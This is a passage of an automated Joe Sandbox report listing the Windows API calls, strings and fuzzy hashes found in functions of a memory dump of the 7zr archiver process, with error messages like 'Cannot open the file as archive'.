                        • Instruction ID: f0733d2e840af1fbd11366aa2228f1e2e14f8e78daee4ed1d6fdf7ab232f4ef8
                        • Opcode Fuzzy Hash: f71890d2a07bb457ca48bf79a0c6c61ecf4c5aeca5b87369e245ed03874150dc
                        • Instruction Fuzzy Hash: 1F310A319003199BDF17FBA5C8929EEBBB4FF14300F5040AAE50676191EB755A85CBA1
                        APIs
                        • __EH_prolog.LIBCMT ref: 003906FB
                        • EnterCriticalSection.KERNEL32(?), ref: 0039070B
                        • LeaveCriticalSection.KERNEL32(?,?), ref: 00390786
                          • Part of subcall function 0039089E: _CxxThrowException.MSVCRT(?,00434A58), ref: 003908C4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterExceptionH_prologLeaveThrow
                        • String ID: v
                        • API String ID: 4150843469-3261393531
                        • Opcode ID: 1e45481b499e81bd747cc7858fd3ba7ff2da3894a8f67a1091e8c9e2b7096607
                        • Instruction ID: 95754b638abe3de88b536cb97797568235fb4b48b2a88b12a72d0415595cd0e9
                        • Opcode Fuzzy Hash: 1e45481b499e81bd747cc7858fd3ba7ff2da3894a8f67a1091e8c9e2b7096607
                        • Instruction Fuzzy Hash: DA2159B1A10604DFCB29DF68D584BAABBF0FF48314F10892EE45ACBA42D735A915CF44
                        APIs
                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,0038A3C1,00000001), ref: 0038A4CD
                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0038A4DD
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: RtlGetVersion$ntdll.dll
                        • API String ID: 1646373207-1489217083
                        • Opcode ID: 2edc98999b3800bbf16d0e9b38aa3f69b73dc9b308d7d64472df5c2f2d22e70f
                        • Instruction ID: 8607a64f47a3134eddee4d938563647b5d2438e00ce33019a7b664b2f5f736ab
                        • Opcode Fuzzy Hash: 2edc98999b3800bbf16d0e9b38aa3f69b73dc9b308d7d64472df5c2f2d22e70f
                        • Instruction Fuzzy Hash: ADD05E313146302ABE3066B53C8BBAA12888F40A607524463B800C2041E6C8D99305A9
                        APIs
                        • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 003A0359
                        • GetLastError.KERNEL32(?,?,00000000,?), ref: 003A0382
                        • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 003A03DA
                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 003A03F0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorFileLastSecurity
                        • String ID:
                        • API String ID: 555121230-0
                        • Opcode ID: 976c34fcf6c2a5158f92357e6765985fd87f8f864aed6f894b8f00f5d9f4455e
                        • Instruction ID: bb54b07d6c28c63b852971ba722ebd9d5447f2b8773075232e35750e5d5f304c
                        • Opcode Fuzzy Hash: 976c34fcf6c2a5158f92357e6765985fd87f8f864aed6f894b8f00f5d9f4455e
                        • Instruction Fuzzy Hash: 74316F74900209EFDF16DFA4C880BAEBBB5FF45304F108959E456EB291D770AE41DBA0
                        APIs
                        • __EH_prolog.LIBCMT ref: 00388300
                        • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 0038834F
                        • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 0038837C
                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 0038839B
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                        • String ID:
                        • API String ID: 1689166341-0
                        • Opcode ID: c1474ab6e3a81ff93723efef2f9cd7ddfcf5b3cde24c5020d8432f153598485d
                        • Instruction ID: dbfe39fe039df1afdf6acaf95b000e05f090cea29147390020826afa247e1c74
                        • Opcode Fuzzy Hash: c1474ab6e3a81ff93723efef2f9cd7ddfcf5b3cde24c5020d8432f153598485d
                        • Instruction Fuzzy Hash: 5121D376600204AFDF22AF94DC81AEE7BB9EF84790F2000AEF804A7241CB714E04CB64
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: BlockPackSize$BlockUnpackSize
                        • API String ID: 3519838083-5494122
                        • Opcode ID: 8bfd323546287d2f37088750123e16173dadc3c2731a9f781102f94ed9f1d768
                        • Instruction ID: 2254bd4077abebc4409be4f1fae3e09d9f99b1d1614468c9ff26d929ebee8cd2
                        • Opcode Fuzzy Hash: 8bfd323546287d2f37088750123e16173dadc3c2731a9f781102f94ed9f1d768
                        • Instruction Fuzzy Hash: FE51D371804685AEDF3BDF6488A3FFD7BB1AF16300F1A485ED096D60A2D7225D88D701
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038A4F8
                          • Part of subcall function 0038A384: __EH_prolog.LIBCMT ref: 0038A389
                          • Part of subcall function 00389E14: GetSystemInfo.KERNEL32(?), ref: 00389E36
                          • Part of subcall function 00389E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00389E50
                          • Part of subcall function 00389E14: GetProcAddress.KERNEL32(00000000), ref: 00389E57
                        • strcmp.MSVCRT ref: 0038A564
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                        • String ID: -
                        • API String ID: 2798778560-3695764949
                        • Opcode ID: 9d7945b093f56863371ceefa7c1763a1e55f390b22a308bec971178a24a936ad
                        • Instruction ID: 9b2189dcfdee7c1690f57098658d1b57d3669f541727bfecec8502e6e6801c15
                        • Opcode Fuzzy Hash: 9d7945b093f56863371ceefa7c1763a1e55f390b22a308bec971178a24a936ad
                        • Instruction Fuzzy Hash: 4B319A31D00709DBDF07FBE0D8529EEB775AF40310F1040AAF80176192DB756A85CB62
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: 0$x
                        • API String ID: 3519838083-1948001322
                        • Opcode ID: 28dd31e786b8957529458c612959d65c6d8e9d2680233613ce9f4851044e164e
                        • Instruction ID: 96fd68c246f0ff2e482914640ae809555fbdd45d7bacf40b236fd39b1ab0bd0e
                        • Opcode Fuzzy Hash: 28dd31e786b8957529458c612959d65c6d8e9d2680233613ce9f4851044e164e
                        • Instruction Fuzzy Hash: 3B218732E01219DBCF06EB98D5966EEB7B5FF48304F11006AE9017B242DB795E04CBA1
                        APIs
                        Strings
                        • Cannot open the file as archive, xrefs: 003B86D0
                        • Cannot open encrypted archive. Wrong password?, xrefs: 003B8698
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                        • API String ID: 1795875747-1623556331
                        • Opcode ID: 5a99483707bb66193002a0057f198f14b5d2774918a3c1f58b61b01fb085d847
                        • Instruction ID: 5afcd645019b73df686ad8af0a6ea3f36a46229a18b2fe83c8700fa271b086c5
                        • Opcode Fuzzy Hash: 5a99483707bb66193002a0057f198f14b5d2774918a3c1f58b61b01fb085d847
                        • Instruction Fuzzy Hash: B30144313042005BC616A754D495BAEB3ABAFC8718F64445BE7028BE85DF74A812DB55
                        APIs
                        • __EH_prolog.LIBCMT ref: 003E4039
                          • Part of subcall function 003E40BA: __EH_prolog.LIBCMT ref: 003E40BF
                          • Part of subcall function 003C5E2B: __EH_prolog.LIBCMT ref: 003C5E30
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: D.C$T.C
                        • API String ID: 3519838083-2951376840
                        • Opcode ID: a9c46ab8f94bc12c1ab5540be4f8eba2e42b845838db0f3861bf95fb4ef6e5a3
                        • Instruction ID: 6817a694d8ee0c6814dbb2a20dab5c70891f3fee5427873eafe3ab1a5a31ed9a
                        • Opcode Fuzzy Hash: a9c46ab8f94bc12c1ab5540be4f8eba2e42b845838db0f3861bf95fb4ef6e5a3
                        • Instruction Fuzzy Hash: 37017CB1A00B20CFC724DF65D50669AFBF4AF08704F10C92ED09A97741DBB4AA48CB85
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID: =
                        • API String ID: 1795875747-2525689732
                        • Opcode ID: f9f2e2d5338a22894833d50f1383a6842b75ecb15473c07fabc7b753f0bb369f
                        • Instruction ID: 181ef0888253eef8f105e7bced9f8291c3cdb2ac5092b770c2ad1225a7c9263e
                        • Opcode Fuzzy Hash: f9f2e2d5338a22894833d50f1383a6842b75ecb15473c07fabc7b753f0bb369f
                        • Instruction Fuzzy Hash: E9E0D835F00124D7CB01B7E99C428FE7B7DEB847147900832E610CB240EB709926CBD4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$fputc
                        • String ID: `&D
                        • API String ID: 1185151155-100209823
                        • Opcode ID: 993ae42ec24d3fa2e6d8fd7ec737416bd64918c982d83866ededb36e716224b8
                        • Instruction ID: db64856ad8e33715a3eff6f27465275fce0f5ac0950378c8646bc1569a19badf
                        • Opcode Fuzzy Hash: 993ae42ec24d3fa2e6d8fd7ec737416bd64918c982d83866ededb36e716224b8
                        • Instruction Fuzzy Hash: 3DD02B7370111467C7323BE96C41C9F771CEFC9B14356045BF64097222C6656D515FE4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID: Unsupported Windows version$p&D
                        • API String ID: 1795875747-3838269546
                        • Opcode ID: 828601781fd7ee217816c5ff5f548ed1952bf6c6aabbef700bdff5ef1f4bf93b
                        • Instruction ID: d502e0de17a711bb6549cc2c68942ebfe5104cb5e73f5982a271f100d8ab889e
                        • Opcode Fuzzy Hash: 828601781fd7ee217816c5ff5f548ed1952bf6c6aabbef700bdff5ef1f4bf93b
                        • Instruction Fuzzy Hash: 6FD0A777304100DFD7154B88F947BA43760E38C720F60442BE103C5490D7B56001CA04
                        APIs
                        • memcmp.MSVCRT(?,004348A0,00000010), ref: 003E41D6
                        • memcmp.MSVCRT(?,00430168,00000010), ref: 003E41F1
                        • memcmp.MSVCRT(?,004301E8,00000010), ref: 003E4205
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memcmp
                        • String ID:
                        • API String ID: 1475443563-0
                        • Opcode ID: c71bd2c90fa51386fc0a8bd63ca675940e9084d271a5097a2855cb1298a3e17f
                        • Instruction ID: 4e02a35d0c8ae2f50d9117a136740d18fdae448ad0d558adf98f17c25e0779c6
                        • Opcode Fuzzy Hash: c71bd2c90fa51386fc0a8bd63ca675940e9084d271a5097a2855cb1298a3e17f
                        • Instruction Fuzzy Hash: FE01043134020567DB114A12DC42FFD73A8AB6C720F154A2EFF45DB2C1F6B9E991A2C8